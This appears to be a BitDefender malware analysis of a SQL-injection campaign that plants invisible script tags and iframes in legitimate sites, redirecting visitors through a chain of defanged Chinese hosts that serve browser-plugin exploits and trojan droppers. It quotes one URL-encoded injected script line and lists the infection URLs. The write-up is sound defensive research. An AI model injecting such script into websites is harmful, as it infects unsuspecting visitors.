The exploit doesn't manifest any obvious symptoms. It usually appears on clean sites trough SQL Injection attacks which insert an invisible iframe in the once clean code that leads the unconscious Internet surfer to an "outbreak" infected site.
This attack has a new approach. Here is an example of this kind of injection : <script src="hxxp://%76%63%63%64%2e%63%6e/"></script>. This leads to the infected site hxxp:// vccd.cn.
The mechanism behind the infected site is shown below.
It's always better to prevent : keep the antivirus updated, as well as any application that you might use.
Please let BitDefender disinfect your files.
Daniel Chipiristeanu, virus researcher
The mechanism used by this kind of malware spreading campaigns is rather simple and thus, effective. First it finds vulnerable sites and tries to inject infected code into their databases. This is usually done by "SQL Injection" that inserts malicious code into the previously clean sites. This is similar to the method used by the "Asprox" / "Damnec" Trojan.
The malicious intent is obvious since it modifies the user posted code on the Internet. Not surprisingly, the URL that the user unconsciously follows is used for infection.
After the stealthy redirection to the infected outbreak site, for example hxxp://vccd.cn, it checks for browser settings and tries different exploits to infect the user.
Here is a list of infection flow that was found on this website. They lead to each and other trough iframes.
The first step :
* hxxp://vccd.cn/index.html - sets a cookie which expires in 1000 days and checks for the User-Agent. If it's Internet Explorer then it leads to hxxp://asp-18.cn/ilink.html else it leads to hxxp://asp-18.cn/flink.html. These two check for the version of Flash Player and if it's "9" with subversion older than "115" it downloads a SWF file (Adobe Flash extension) with the name "i[subversion].swf" for the first one and "f[subversion].swf" for the second. These are detected by BitDefender as Exploit.SWF.Gen. Then it points to another site that continues the infection hxxp://www.hxg006.cn/b2.htm.
* hxxp://www.hxg006.cn/b2.htm just leads to hxxp://asp-11.cn/a2/fxx.htm
hxxp://asp-11.cn/a2/ss.html that contains an exploit for Snapshot Viewer for some versions of Microsoft Access. The exploit tries to download hxxp://www.zmjjjyy.cn/new/a2.css detected as Trojan.Dropper.Replacer.A
hxxp://asp-11.cn/a2/fx.html, which is similar to the one previously described, and leads to the same SWF files.
If the "User Agent" is msie7 (Internet Explorer) it creates an invisible iframe hxxp://asp-11.cn/a2/ms06014.htm, which uses the MS06-014 - RDS.DataControl exploit in Microsoft Data Access Component and downloads a file detected as Trojan.Dropper.Replacer.A.
Lianzhong chat room (GLIEDown.IEDown.1) exploit in the found in hxxp://asp-11.cn/a2/GLWORLD.html (detected as Trojan.Exploit.JS.G) which downloads hxxp://down.hs7yue.cn/new/a4.css (Trojan.Dropper.Replacer.A).
hxxp://jzm015.cn/sina.htm using "DownloadAndInstall" exploit downloads hxxp://down.hs7yue.cn/down/sina.exe (heuristicaly detected as Generic.Malware.SYBdld.1FBF30D9).
RealPlayer exploit hxxp://asp-11.cn/a2/real.htm or hxxp://asp-11.cn/a2/real.html that check for product version and downloads hxxp://down.hs7yue.cn/down/ko.css detected as Trojan.Dropper.Replacer.A.
hxxp://jzm015.cn/UU.htm which is an vulnerability that affects the 'Update' method of the 'UUUpgrade.ocx' that can download a file onto the affected computer. The file was unavailable at time of analysis.